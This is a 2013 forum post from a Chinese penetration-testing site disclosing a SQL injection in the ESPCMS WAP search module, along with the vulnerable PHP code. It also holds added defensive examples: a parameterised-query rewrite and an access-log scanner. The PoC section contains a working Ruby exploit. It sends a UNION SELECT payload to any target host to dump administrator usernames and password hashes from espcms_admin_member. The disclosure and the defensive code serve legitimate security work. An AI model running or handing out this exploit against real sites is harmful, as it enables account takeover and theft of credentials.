中国网络渗透测试联盟 (China Cyber Penetration Testing Alliance)
Title: SQL injection in the search of the espcms wap module
Author: admin
Posted: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview

ESPCMS (易思) is an enterprise website management system built on the LAMP stack. It is simple to operate, feature-rich, stable, highly extensible and secure, and easy to customize and maintain, and it can help you build a powerful, professional corporate website quickly and easily.

Its handling of incoming parameters is not rigorous, which leads to SQL injection.
0x1 Vulnerability details

The variable travels along the path $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it, which is what makes the injection possible.

Because the variable is read from $_SERVER['QUERY_STRING'], it sidesteps the program's own input filtering.

And the injected variable is an array value rather than an array key, so it escapes that filtering as well; taken together, this produces a fairly unusual SQL injection.

In the in_result function of /interface/3gwap_search.php:
function in_result() {
    ... ... ... ... ... ... ... ... ...
    // The raw query string is parsed directly, bypassing the framework's usual input filtering.
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // Only the array key is escaped and trimmed; the value is left untouched.
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // The unescaped value is concatenated straight into the WHERE clause.
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
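The fix a practitioner would want here, as an added example rather than anything from ESPCMS: the attribute name is a column identifier and cannot be bound, so it is validated (identifier characters only, and present in model_att), while the attribute value travels as a bound parameter instead of being concatenated. The code assumes a PDO connection, a simplified schema and an espcms_ table prefix; the tables, rows and query strings below are constructed so the script runs offline against SQLite.

```php
<?php
// Added example, not ESPCMS code: a hardened rewrite of the attr[] handling from
// in_result(). The table layout, rows and query strings are constructed fixtures.

function build_attr_where(PDO $pdo, array $attr, string $prefix = 'espcms_'): array
{
    $where  = '';
    $params = [];
    // The existence check also uses a placeholder instead of addslashes() on the key.
    $lookup = $pdo->prepare("SELECT COUNT(*) FROM {$prefix}model_att WHERE isclass=1 AND attrname=?");

    foreach ($attr as $key => $value) {
        if (!is_string($value) || $value === '') {
            continue;
        }
        // A column name is emitted as an identifier, so restrict it to identifier
        // characters first, then require that it is a real, enabled attribute.
        if (!is_string($key) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $key)) {
            continue;
        }
        $lookup->execute([$key]);
        $exists = (int)$lookup->fetchColumn() > 0;
        $lookup->closeCursor();
        if (!$exists) {
            continue;
        }
        // The value is user data: it reaches the query only through a placeholder.
        $where   .= " AND b.`{$key}` = ?";
        $params[] = $value;
    }
    return [$where, $params];
}

function search_documents(PDO $pdo, string $queryString, string $prefix = 'espcms_'): array
{
    parse_str(html_entity_decode($queryString), $output);
    $attr = $output['attr'] ?? [];
    [$where, $params] = build_attr_where($pdo, is_array($attr) ? $attr : [], $prefix);
    $sql = "SELECT b.*, a.* FROM {$prefix}document AS a "
         . "LEFT JOIN {$prefix}document_attr AS b ON a.did=b.did WHERE 1=1" . $where
         . " LIMIT 0,15";
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return [$sql, $stmt->fetchAll(PDO::FETCH_ASSOC)];
}

// --- constructed fixture: an in-memory SQLite stand-in for the MySQL tables ---
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE espcms_model_att (attrname TEXT, isclass INTEGER)");
$pdo->exec("INSERT INTO espcms_model_att VALUES ('jobnum', 1), ('salary', 0)");
$pdo->exec("CREATE TABLE espcms_document (did INTEGER, title TEXT)");
$pdo->exec("CREATE TABLE espcms_document_attr (did INTEGER, jobnum TEXT)");
$pdo->exec("INSERT INTO espcms_document VALUES (1, 'first'), (2, 'second')");
$pdo->exec("INSERT INTO espcms_document_attr VALUES (1, '1'), (2, '2')");

// Constructed query strings in the shape in_result() accepts: a plain value,
// a value carrying a quote, and attribute names that must be rejected.
foreach ([
    "ac=search&at=result&attr[jobnum]=1",
    "ac=search&at=result&attr[jobnum]=1' OR '1'='1",
    "ac=search&at=result&attr[salary]=5&attr[bogus;]=x",
] as $qs) {
    [$sql, $rows] = search_documents($pdo, $qs);
    printf("%s\n  -> %s\n  -> %d row(s)\n", $qs, $sql, count($rows));
}
```

With the quote bound as data, the second query string matches nothing instead of altering the WHERE clause, and `salary` (disabled) and `bogus;` (not an identifier) never reach the SQL at all. In the real code base the pagination class still receives a raw SQL string, so applying this pattern means passing the parameter list through to wherever the query is finally executed.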
0x2 PoC
require "net/http"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog: http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "\nsend request..."
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
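For operators of an affected site, the useful counterpart to the PoC is knowing what such a request looks like in the web server log. The following is an added example, not part of the original post: it walks constructed access-log lines in the common log format, decodes each query string the same way in_result() does, and reports requests whose attr[...] values carry quote characters, comment markers or UNION/SELECT. The log lines and addresses are constructed.

```php
<?php
// Added example, not part of the original post: a log check that flags requests
// whose attr[...] values carry SQL syntax. The log lines below are constructed.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [27/Jul/2013:18:31:02 +0800] "GET /wap/index.php?ac=search&at=result&keyword=1&attr[jobnum]=1 HTTP/1.1" 200 2311
203.0.113.9 - - [27/Jul/2013:18:31:07 +0800] "GET /wap/index.php?ac=search&at=result&keyword=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2 HTTP/1.1" 200 4870
198.51.100.2 - - [27/Jul/2013:18:32:10 +0800] "GET /index.php?ac=article&id=12 HTTP/1.1" 200 1200
LOG;

// Returns the attr[] entries of one query string whose values contain quote
// characters, comment markers or UNION/SELECT. Decoding mirrors the vulnerable
// code (html_entity_decode followed by parse_str) so the same bytes are inspected.
function suspicious_attr_values(string $query): array
{
    parse_str(html_entity_decode($query), $params);
    if (!isset($params['attr']) || !is_array($params['attr'])) {
        return [];
    }
    $hits = [];
    foreach ($params['attr'] as $name => $value) {
        if (is_string($value) && preg_match('/[\'"]|--|#|\b(?:union|select)\b/i', $value)) {
            $hits[(string)$name] = $value;
        }
    }
    return $hits;
}

// Walks a log in common/combined format and collects every request whose
// query string has suspicious attr[] values.
function scan_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ip, timestamp, request method (ignored) and request target
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:\S+) (\S+)/', $line, $m)) {
            continue;
        }
        [, $ip, $when, $target] = $m;
        $parts = explode('?', $target, 2);
        if (count($parts) < 2) {
            continue;   // no query string, nothing to inspect
        }
        $hits = suspicious_attr_values($parts[1]);
        if ($hits) {
            $findings[] = ['ip' => $ip, 'time' => $when, 'path' => $parts[0], 'attr' => $hits];
        }
    }
    return $findings;
}

foreach (scan_log(SAMPLE_LOG) as $f) {
    printf("[%s] %s requested %s with attr values: %s\n",
        $f['time'], $f['ip'], $f['path'], json_encode($f['attr']));
}
```

Only the second line is reported: the first carries a plain numeric value and the third has no attr[] parameter. Because the check decodes percent-encoding before matching, encoded quotes such as %27 are caught the same way as literal ones; a rule that only looked at the raw request line would miss them.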
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2